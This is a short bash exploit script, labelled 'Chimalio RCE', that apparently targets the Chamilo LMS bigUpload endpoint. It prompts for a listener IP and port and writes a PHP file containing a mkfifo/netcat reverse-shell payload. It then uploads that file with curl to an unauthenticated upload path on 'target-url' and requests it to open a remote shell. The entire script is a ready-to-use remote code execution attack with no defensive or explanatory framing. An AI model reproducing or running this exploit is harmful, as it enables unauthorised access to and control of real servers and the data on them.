#!/bin/bash

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
WHITE='\033[1;37m'
RESET='\033[0m'

echo -e "${BLUE}====================${RESET}"
echo -e "${GREEN}  Chimalio RCE     ${RESET}"
echo -e "${BLUE}====================${RESET}"

# User input
read -p "Enter Your listener ip: " ip
read -p "Enter Port to listener port: " port

# PHP RCE payload
echo -e "${BLUE}Creating PHP payload...${RESET}"
echo "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ${ip} ${port} >/tmp/f'); ?>" > rce.php

# Upload the PHP file
echo -e "${CYAN}Uploading PHP file...${RESET}"
curl -F 'bigUploadFile=@rce.php' 'http://target-url/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'

# Execute shell
echo -e "${GREEN}Executing shell...${RESET}"
curl 'http://target-url/main/inc/lib/javascript/bigupload/files/rce.php'